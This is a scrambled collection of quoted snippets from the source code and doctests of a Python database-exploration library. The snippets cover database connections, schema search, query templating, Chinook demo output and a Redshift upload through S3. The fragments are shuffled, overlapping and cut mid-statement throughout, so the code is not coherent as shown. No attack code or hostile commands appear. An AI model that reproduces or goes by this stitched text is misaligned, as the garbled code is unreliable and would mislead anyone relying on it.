psycopg2 library. Please ensure it is installed\")", "limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About To Rock We", "Wall 0.99 2 Fast As a Shark 0.99 3 Restless and Wild 0.99", "= 1433 elif profile is not None: pass else: raise Exception(\"Database type not", "----------- search: str glob pattern for what you're looking for Examples ---------- >>>", "Dirkscneider & W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051", "ones that fit into our framework), so we're going to create them. \"\"\"", "to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\")", "in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of", "not, there's always a random issue where rows are not in the same", "class DB(object): \"\"\" Utility for exploring and querying a database. Parameters ---------- username:", "GenreId | INTEGER | | Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\"", "isinstance(data_type, str): data_type = [data_type] cols = [] for table in self.tables: for", "else: if limit: q = \"select top {limit} * from ({q}) q\".format(limit=limit, q=q)", "| | Artist | ArtistId | INTEGER | | Customer | SupportRepId |", "DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception(\"Profile '{0}' does not exist.", "be limitless. Bradley Cooper style.) keys_per_column: int, None Default number of keys to", ">>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3", "of records to return in a query. This is used by the DB.query", "NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") #", "... Album a ... INNER JOIN ... Track t ... on a.AlbumId =", "| Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Customer", "Table | Column Name | Type | +----------+----------------+--------------+ | Customer | Address |", "<NAME>, U. Dirkscneider & W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U.", ">>> template = ''' ... SELECT ... '{{ name }}' as table_name, ...", "0.99 \"\"\" with open(filename) as fp: q = fp.read() return self.query(q, data=data, union=union,", "7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9", "template = ''' ... SELECT ... '{{ name }}' as table_name, ... COUNT(*)", "Salute You Name UnitPrice 0 For Those About To Rock (We Salute You)", ">>> db = DemoDB() >>> q = ''' ... SELECT ... a.Title, ...", "with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads =", "dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all", "tables(self): \"\"\"A lazy loaded reference to the table metadata for the DB.\"\"\" if", "you'll be limitless. Bradley Cooper style.) keys_per_column: int, None Default number of keys", "encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for i in chunks: t", "sql FROM sqlite_master ;\") for (table_name, sql) in self.cur: rgx = \"FOREIGN KEY", "<NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334", "limit: int Number of records to return Examples -------- >>> from db import", "IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from", "Column Name | Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) |", "for what you're looking for Examples ---------- >>> from db import DemoDB >>>", "in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\"", "Invoice | CustomerId | INTEGER | | Invoice | BillingAddress | NVARCHAR(70) |", "Parameters ---------- username: str Your username for the database password: str Your password", "0.99 9 Evil Walks 0.99 \"\"\" with open(filename) as fp: q = fp.read()", "| Track | MediaTypeId | INTEGER | | Track | GenreId | INTEGER", "INTEGER | | Track | Milliseconds | INTEGER | | Track | GenreId", "<NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>,", "import os import sys from collections import defaultdict import pandas as pd import", "0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item)", "You 1 1 2 Balls to the Wall 2 2 3 Restless and", "= TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())])", "... SELECT ... '{{ name }}' as table_name, ... COUNT(*) as cnt ...", "3 \"\"\" if data: q = self._apply_handlebars(q, data, union) if limit: q =", "self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property", "data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For Those", "for refreshing schema # 1. load directly from cache # 2. use a", "6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>> q = ''' ...", "for all tables as list of tuples if told to use cached metadata", "database is running on. defaults to default port for db. portgres: 5432 redshift:", "if f: creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname =", "self.driver = driver if self.dbtype is None: raise Exception(\"Database type not specified! Must", "hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur del", "(\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False,", "'{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur", "self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str", "'s3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if", "metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in", "value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables,", "style.) keys_per_column: int, None Default number of keys to display in the foreign", "Those About To Rock We Salute You 8 For Those About To Rock", "exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\")", "cols: if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name,", "mysql: 3306 sqlite: n/a mssql: 1433 filename: str path to sqlite database dbname:", "Data will be passed to the template and rendered using handlebars. union: bool", ">>> results = db.find_table(\"*Invoice*\") # returns all tables containing trans >>> results =", "= {} # generate our Columns, and attach to each table to the", "\"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q = \"select * from ({q}) q", "portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str path", "in some cases. driver: str, None Driver for mssql/pyodbc connections. Examples -------- db", "| CustomerId | INTEGER | | InvoiceLine | TrackId | INTEGER | |", "import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\",", "UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994 0.99 3 4331779 0.99", "sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table ONLY if it", "this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket", "HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility", "COUNT(*) as cnt ... FROM ... {{ name }} ... GROUP BY ...", "[] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) #", "boto library. Please ensure it is installed\") if s3 is not None: AWS_ACCESS_KEY", "chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk =", "always a random issue where rows are not in the same order, making", "Upload speed is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes have", "use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in self._metadata_cache: #", "About To Rock We Salute You 1 Balls to the Wall 2 Restless", "& W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4", ">>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q,", "it is installed\") if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY =", "import Location # if boto is present, set the bucket_location to default. #", "TableSet from .s3 import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from", "Salute You 7 For Those About To Rock We Salute You 8 For", "foreign_key)) for row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column)", "\"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\":", "create the temporary transfer s3 bucket. This should match your redshift cluster's region.", "<NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2 1 <NAME>, <NAME>, U.", "{user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del", "<NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy & R.A. Smith-Diesel 375418", "= os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None:", "files we've created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql = \"\"\" copy", "| NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\",", "import DemoDB >>> db = DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId", "| | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) #", "\"\"\" Removes a profile from your config \"\"\" user = os.path.expanduser(\"~\") if s3:", "if arg==\"username\": arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg", "= None return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\":", "\"\"\" if data: q = self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q,", "whether you'd like to drop the table if it already exists chunk_size: int", "\"\"\" Lists all of the database profiles available Examples -------- No doctest, covered", "not exist. Could not find file {1}\".format(name, f)) os.remove(f) except Exception as e:", "f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all", "use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for", "The Finger On You 0.99 6 Let's Get It Up 0.99 7 Inject", "a.AlbumId = t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q)", "self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile)", "AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws secrety key. if this", "DB.query method. You can override it by adding limit={X} to the `query` method,", "find_table(self, search): \"\"\" Aggresively search through your database's schema for a table. Parameters", "of DB that hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/ for more", "Princess of the Dawn 0.99 5 Put The Finger On You 0.99 6", "threads = [] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start()", "your environment variables AWS_SECRET_KEY: str your aws secrety key. if this is None,", "data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';\")", "from S3. Upload speed is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL", "JOIN ... Track t ... on a.AlbumId = t.AlbumId; ... ''' >>> len(db.query(q))", "def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB that hooks up to", "import gzip try: from StringIO import StringIO # Python 2.7 except: from io", "= password self.hostname = hostname self.port = port self.filename = filename self.dbname =", "| Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all", "df: DataFrame data frame you want to save to the db drop_if_exists: bool", "else: query = \"\\n\".join(query) elif isinstance(data, dict): query = template(data) query = str(query)", "To Rock We Salute You 9 For Those About To Rock We Salute", "not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel", "\"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect(", "... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For Those About", "as pd import pybars from .column import Column, ColumnSet from .table import Table,", "MediaTypeId | INTEGER | | Playlist | PlaylistId | INTEGER | | PlaylistTrack", "Let There Be Rock 1 4 5 Big Ones 3 \"\"\" if data:", "Number of records to return Examples -------- >>> from db import DemoDB >>>", "created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql = \"\"\" copy {name} from", "as credentials plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def", "Shark 3 2 3 4 Restless and Wild 3 2 4 5 Princess", "a profile from your config \"\"\" user = os.path.expanduser(\"~\") if s3: f =", "select one of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache = cache if", "not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please ensure it is installed\") self.con", "False try: import sqlite3 as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE =", "_try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print (\"Error executing command:\") print", "sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not None and isinstance(self.schemas, list) and", "| INTEGER | | Employee | EmployeeId | INTEGER | | Genre |", "the database hostname: str Hostname your database is running on (i.e. \"localhost\", \"10.20.1.248\")", "| | Employee | EmployeeId | INTEGER | | Genre | GenreId |", "limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is None: raise Exception(\"Database", "| Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type]", "threading import glob import gzip try: from StringIO import StringIO # Python 2.7", "cnt 0 Album 347 1 Artist 275 2 Track 3503 >>> q =", "using handlebars. union: bool Whether or not \"UNION ALL\" handlebars templates. This will", "| | MediaType | MediaTypeId | INTEGER | | Track | MediaTypeId |", "os.path.join(os.getcwd(), self.filename) else: db_filename = None return { \"username\": self.username, \"password\": self.password, \"hostname\":", "1 1 1 2 Balls to the Wall 2 2 2 3 Fast", "all credentials for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename", "\"\\n\".join(query) elif isinstance(data, dict): query = template(data) query = str(query) else: return q", "| Employee | EmployeeId | INTEGER | | Employee | Address | NVARCHAR(70)", "= \"select top {limit} * from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self,", "if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for", "viable... -= if not, there's always a random issue where rows are not", "load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port')", "Preconfigured database credentials / profile for how you like your queries exclude_system_tables: bool", "= [str(item) for item in query] if union==True: query = \"\\nUNION ALL\".join(query) else:", "= [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... ]", "... on a.AlbumId = t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f:", "+---------------+---------------+---------+ | Album | AlbumId | INTEGER | | Album | ArtistId |", "elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please ensure it", "Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor()", "and Wild 5 For Those About To Rock We Salute You 6 For", "\"\") # we'll create the table ONLY if it doens't exist sql =", "BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address", "| | Customer | CustomerId | INTEGER | | Employee | ReportsTo |", "[] table_meta = {} # pull out column metadata for all tables as", ".table import Table, TableSet from .s3 import S3 from .utils import profile_path, load_profile,", "on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the database is running on. defaults", "| NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) | | Track |", "varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for", "cols): tables = {} # generate our Columns, and attach to each table", "Evil Walks 0.99 \"\"\" with open(filename) as fp: q = fp.read() return self.query(q,", "self.filename = filename self.dbname = dbname self.dbtype = dbtype self.schemas = schemas self.limit", "db import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\")", "prod_ >>> results = db.find_table(\"*Invoice*\") # returns all tables containing trans >>> results", "len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some", "... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... ] >>> db.query(q,", "from .s3 import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates", "if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name,", "Rock We Salute You 6 For Those About To Rock We Salute You", "data, but it will probably stop your little sister from stealing your passwords.", "| MediaTypeId | INTEGER | | Track | Milliseconds | INTEGER | |", "Name AlbumId MediaTypeId \\\\\\r 0 1 For Those About To Rock (We Salute", "... {{else}} ... {{ . }} , ... {{/if}} ... {{/cols}} ... FROM", "port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE:", "to the table metadata for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache)", "| Table | Column Name | Type | +----------+----------------+--------------+ | Customer | Address", "all key relationships # 3. use the naive approach if use_cache: # generate", "a database. Parameters ---------- username: str Your username for the database password: str", "This is used to control the rendering of PrettyTable a bit. None means", "ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit =", "username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur =", "3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some way for", "InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId | INTEGER | | MediaType", "an S3 object print_sql: bool (False) option for printing sql statement that will", "Bradley Cooper style.) keys_per_column: int, None Default number of keys to display in", "This will take a second...\") rows_to_insert = [] tables = [row[0] for row", "Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table ONLY if", "<NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME>", "of schemas to include. Defaults to all. profile: str Preconfigured database credentials /", "+-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Customer | SupportRepId |", "any new tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables =", "def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your database from a file.", "and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t],", "Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1 For Those About To", "None Default number of keys to display in the foreign and reference keys.", "Let's Get It Up 1 1 7 8 Inject The Venom 1 1", "{} # pull out column metadata for all tables as list of tuples", "sqlite_master where type='table';\")] for table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table,", "None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument or as an environment", "tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def", "sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql)", "| +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address that are varchars", "hostname: str Hostname your database is running on (i.e. \"localhost\", \"10.20.1.248\") port: int", "0.99 3 4331779 0.99 4 6290521 0.99 5 6713451 0.99 6 7636561 0.99", "foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\"", "rendered using handlebars. union: bool Whether or not \"UNION ALL\" handlebars templates. This", "if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as either function argument or", "not None and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema)", "database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler()", "| Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Employee", "import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False", "profile is not None: pass else: raise Exception(\"Database type not specified! Must select", "table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None):", "q return query def query(self, q, data=None, union=True, limit=None): \"\"\" Query your database", "your database's schema again and looks for any new tables and columns. \"\"\"", "s3 argument is a prefix, so it'll pick up # all of the", "False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError: try:", "\\ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2 1", "Track | TrackId | INTEGER | | Track | AlbumId | INTEGER |", "Evil Walks 1 1 GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME>", "5 Big Ones 3 \"\"\" if data: q = self._apply_handlebars(q, data, union) if", "# second value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys", "= driver if self.dbtype is None: raise Exception(\"Database type not specified! Must select", "grab AWS_SECRET_KEY from your environment variables s3: S3 alternative to using keys, you", "0 For Those About To Rock We Salute You 1 Balls to the", "names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar,", "InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER | | Playlist", "cache # 2. use a single query for getting all key relationships #", "Three modes for refreshing schema # 1. load directly from cache # 2.", "driver=None, cache=False): if port is None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\":", "del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given profile. Profiles", "is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not", "NVARCHAR(70) | | Customer | SupportRepId | INTEGER | | Customer | CustomerId", "StringIO # Python 2.7 except: from io import StringIO # Python 3.3+ import", "tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print (\"Error executing", "for item in data] query = [str(item) for item in query] if union==True:", "-------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db", "raise Exception(\"Couldn't find sqlite library. Please ensure it is installed\") self.con = sqlite.connect(self.filename)", "= [] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t)", "have 2 slices per node, so if running 2 nodes you will want", "match your redshift cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature", "dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass", "(column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in", "import S3Connection from boto.s3.key import Key from boto.s3.connection import Location # if boto", "run the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in", "search: str glob pattern for what you're looking for data_type: str, list (optional)", "profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f:", "= q.rstrip().rstrip(\";\") q = \"select * from ({q}) q limit {limit}\".format(q=q, limit=limit) return", "in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name)", "NVARCHAR(70) | | Employee | Address | NVARCHAR(70) | | Invoice | BillingAddress", "def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self):", "returns all tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\") # returns all", "and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],", "s3=False): \"\"\" Removes a profile from your config \"\"\" user = os.path.expanduser(\"~\") if", "Table, TableSet from .s3 import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json", "1 2 Balls to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes", "what you're looking for data_type: str, list (optional) specify which data type(s) you", "INTEGER | | Genre | GenreId | INTEGER | | Invoice | InvoiceId", "no limit (That's right, you'll be limitless. Bradley Cooper style.) keys_per_column: int, None", "redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str path to sqlite", "so you don't have to save them in script. Parameters ---------- profile: str", "data frame you want to save to the db drop_if_exists: bool (False) whether", "that you'll have verrrrrrrry wide columns in some cases. driver: str, None Driver", "+--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp >>>", "HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure", "True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite", "to be viable... -= if not, there's always a random issue where rows", "AlbumId MediaTypeId \\ 0 1 For Those About To Rock (We Salute You)", "\"\"\" Query your database with a raw string. Parameters ---------- q: str Query", "| Track | GenreId | INTEGER | | Track | Bytes | INTEGER", "templates. This will return any handlebars queries as a single data frame. limit:", "6599424 0.99 9 8611245 0.99 >>> q = ''' ... SELECT ... a.Title,", "t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql:", "4 6290521 0.99 5 6713451 0.99 6 7636561 0.99 7 6852860 0.99 8", "all tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns all tables", "column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM", "sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1", "U. Dirkscneider & W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D...", "INTEGER | | Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type,", "HAS_PG: raise Exception(\"Couldn't find psycopg2 library. Please ensure it is installed\") self.con =", "variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific", "| | Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all", "NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY", "You Name UnitPrice 0 For Those About To Rock (We Salute You) 0.99", "Artist 275 2 Track 3503 >>> q = ''' ... SELECT ... {{#cols}}", "u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres',", "import uuid import re import os import sys from collections import defaultdict import", "InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER | | 